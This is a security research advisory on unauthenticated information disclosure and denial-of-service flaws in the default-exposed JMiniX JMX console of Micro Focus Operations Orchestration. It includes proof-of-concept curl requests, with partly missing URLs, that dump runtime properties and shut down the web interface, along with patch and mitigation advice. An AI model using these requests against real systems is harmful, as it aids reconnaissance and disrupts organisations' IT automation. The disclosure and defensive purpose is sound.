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Tenable Research Advisory: Micro Focus Operations Orchestration, Remote Denial-of-Service (DoS) Vulnerability

Tenable Research just released an advisory for an information disclosure and denial-of-service vulnerability in Micro Focus Operations Orchestration software.

This post provides further context around the discovered vulnerability.

What do you need to know? Tenable Research has discovered information disclosure and denial-of-service vulnerabilities in Micro Focus Operations Orchestration version 10.X. These can be used to disclose sensitive runtime information and shut down the JMiniX JMX console used for administrative web-based access.

What's the attack vector? Exploitation requires remote unauthenticated network access and is trivial to exploit.

What's the business impact? Malicious attackers can gather sensitive runtime information for reconnaissance. Even worse, a malicious attacker can remotely shut down the JMiniX JMX console that provides access to the web user interface. Micro Focus Operations Orchestration is used by IT and DevOps operation teams to automate IT processes such as incident and disaster recovery, and hybrid cloud provisioning and configuration.

What's the solution? Micro Focus has released a software update and advisory. Affected users must apply the patch as soon as possible.


Micro Focus merged with HPE Software in 2017 and HPE Operations Orchestrator was rebranded Micro Focus Operations Orchestrator.

Micro Focus Operations Orchestrator is a component of Micro Focus's Hybrid Cloud Management (HCM) and other ITOM suites for the automation of end-to-end IT processes. It is commonly used by large enterprises to automate incident and disaster recovery, and hybrid cloud provisioning and configuration processes and tasks.


The default configuration of Operations Orchestration exposes the JMiniX JMX console to unauthenticated remote users. A malicious attacker can use this console to gather information.

All that's required is remote network access to the application. Exploitation is trivial (e.g., using curl).

Information disclosure

Below is an example showing how to interrogate the application to disclose sensitive runtime information.

albinolobster@ubuntu:~$ curl -d "executed=true" -X POST
#Wed Feb 28 11:01:57 EST 2018
java.vendor=Azul Systems, Inc.
catalina.base=C\:/Program Files/Hewlett Packard Enterprise/HPE Operations Orchestration/central/tomcat
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
os.name=Windows 10
sun.boot.class.path=C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\resources.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\rt.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\sunrsasign.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jsse.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jce.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\charsets.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\lib\\jfr.jar;C\:\\Program Files\\Hewlett Packard Enterprise\\HPE Operations Orchestration\\java\\classes
java.vm.specification.vendor=Oracle Corporation
javax.net.ssl.keyStore=C\:/Program Files/Hewlett Packard Enterprise/HPE Operations Orchestration/central/var/security/certificate.p12
... snip ...

Denial of service

The example below shuts down the web interface, leading to a denial of service.

albinolobster@ubuntu:~$ curl -d "executed=true" -X POST,port=8080/operations/stop%28%29/
curl: (52) Empty reply from server
albinolobster@ubuntu:~$ curl -vv
* Trying
* Connected to ( port 8080 (#0)
> GET /oo/ HTTP/1.1
> Host:
> User-Agent: curl/7.54.0
> Accept: */*

Vendor response

Micro Focus released a software update and an associated advisory, MFSBGN03801 rev.1, on March 1, 2018.

A note on the CVSS scoring: Micro Focus has given this a score using AC:H (or Access Complexity: High). The description for a Low access complexity follows:

Specialized access conditions or extenuating circumstances do not exist. The following are examples:

  • The affected product typically requires access to a wide range of systems and users, possibly anonymous and untrusted (e.g., Internet-facing web or mail server).
  • The affected configuration is default or ubiquitous.
  • The attack can be performed manually and requires little skill or additional information gathering.
  • The race condition is a lazy one (i.e., it is technically a race, but easily winnable).

The affected configuration is the default configuration. Tenable CVSS scoring reflects this, while Micro Focus's does not. Tenable Research has notified MITRE.

Business impact

Malicious attackers can gather sensitive runtime information to gather reconnaissance data for further attacks.

More concerning, a malicious attacker can remotely shut down the JMiniX JMX console that provides access to the web user interface. An attacker could detrimentally impact operational integrity by repeated denial-of-service attacks. In combination with other attack methods (e.g., ransomware attack), this can impact disaster and incident recovery measures.


  • Apply the software update supplied by Micro Focus as soon as possible.
  • As a workaround to mitigate exploitation, restrict network access to authorized users only.
  • Tenable has released a plugin to detect the vulnerability: Plugin ID 107094 Micro Focus Operations Orchestration JMiniX Multiple Vulnerabilities

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